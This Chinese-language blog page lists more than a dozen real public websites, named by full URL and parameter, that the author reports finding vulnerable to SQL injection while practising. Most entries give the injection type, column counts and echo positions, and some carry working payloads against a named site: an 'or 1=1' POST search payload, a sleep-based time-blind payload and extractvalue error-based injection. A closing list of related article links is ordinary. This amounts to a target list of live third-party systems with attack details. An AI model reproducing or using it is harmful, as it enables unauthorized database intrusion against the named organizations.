当前位置: 首页 > news >正文

存在sql注入的公网站点

news 2024/11/1 9:04:23

此数据为博主在新手阶段练习sql注入时发现的站点,漏洞可能修复,备注可能错误

url: https://www.uni-1.com.hk/about_en.php?id=2
注入点类型:数值
sql报错回显:无
sql语句执行:[order by] [union]
字段数:14
回显点:12,13,14


url: https://atmos.mora.com.pl/blank.php?id=19088
注入点类型:数值
sql报错回显:无
sql语句执行:顺利
回显点:1,2,3
用户权限:低

https://www.csi-india.org/news/index.php?id=18
注入点类型:数值
sql报错回显:无
sql语句执行:顺利
字段数:8
回显点:3,4,5,6

http://jwsm.cc/blank.php?id=136
注入点类型:num
sql报错回显:无
权限:普通

https://esjindex.org/search.php?id=2
注入点类型:字符 
异常载荷:' 
sql报错回显:存在
字段:22
union联合查询失效
sleep判断失效

http://www.qdbohai.com/project/list.php
注入点类型:搜索框
传参类型:post传参
输出[all]载荷:keywords=aaaa' or 1=1--+

https://www.sunchampion.com/about.php?id=41
注入点类型:数值
传参类型:get
sql报错回显:存在
回显点:存在
sql报错盲注载荷:exreactvalue

url:https://www.zenith.edu.hk/tc/school.php?id=35
注入点:id=35
类型:str
sql报错回显:存在
页面回显:无,页面自动跳转
sql报错盲注载荷:exreactvalue
comment:union非法混合,

url:https://abp.bzh/article.php?id=31347
类型:str
sql报错回显:存在
页面回显:无
注入方式:sleep延时盲注
comment:order by失效,union失效
盲注载荷:' and if((length(database()))=13,sleep(0),sleep(5)) --+

url:https://www.ciritas.ru/faq2.php?id=2
类型:str

url:https://uppo.pt/announce.php?id=136
类型:str
sql报错回显:无
字段数:19
comment:union失效,403

url:https://www.spbigbag.com/news_view.php?id=1
类型:str


http://www.mrgr.cn/news/63070.html

相关文章:

  • 深入理解 Java UUID 五个版本的区别及使用场景
  • C++ | Leetcode C++题解之第515题在每个树行中找最大值
  • MySQL查看某个数据库里面每张表的字符集和字符排序集
  • Unity BesHttp插件修改Error log的格式
  • 2024 Rust现代实用教程:1.3获取rust的库国内源以及windows下的操作
  • 如何用Python同时抓取多个网页:深入ThreadPoolExecutor
  • 详细分析SQL state [99999]; error code [17059]; 无法转换为内部表示 解决方法(实战讲解)
  • DICOM基础:CT类型DICOM图像信息头分析
  • 手撕代码:C#.NET实现自定义IOC容器
  • 【C++】类和对象(九):再谈构造函数
  • python画图|errorbar初探
  • 鸿蒙NEXT开发笔记(九)仿微信聊天App的收发文本消息
  • 无人机救援系统基本组成
  • 选项卡设计与实现
  • Python酷库之旅-第三方库Pandas(183)
  • [数组基础] 0724. 寻找数组的中心下标
  • 机器学习算法之回归算法
  • Java中跳转结构
  • 实系数多项式的运算算法
  • <HarmonyOS第一课>HarmonyOS SDK开放能力简介的课后习题
  • 用示波器如何调方波?
  • 11-Python基础编程之错误和异常
  • HTML 事件
  • 深入理解 Java UUID 五个版本的区别及使用场景
  • PMP–知识卡片--项目经理领导风格
  • Partition架构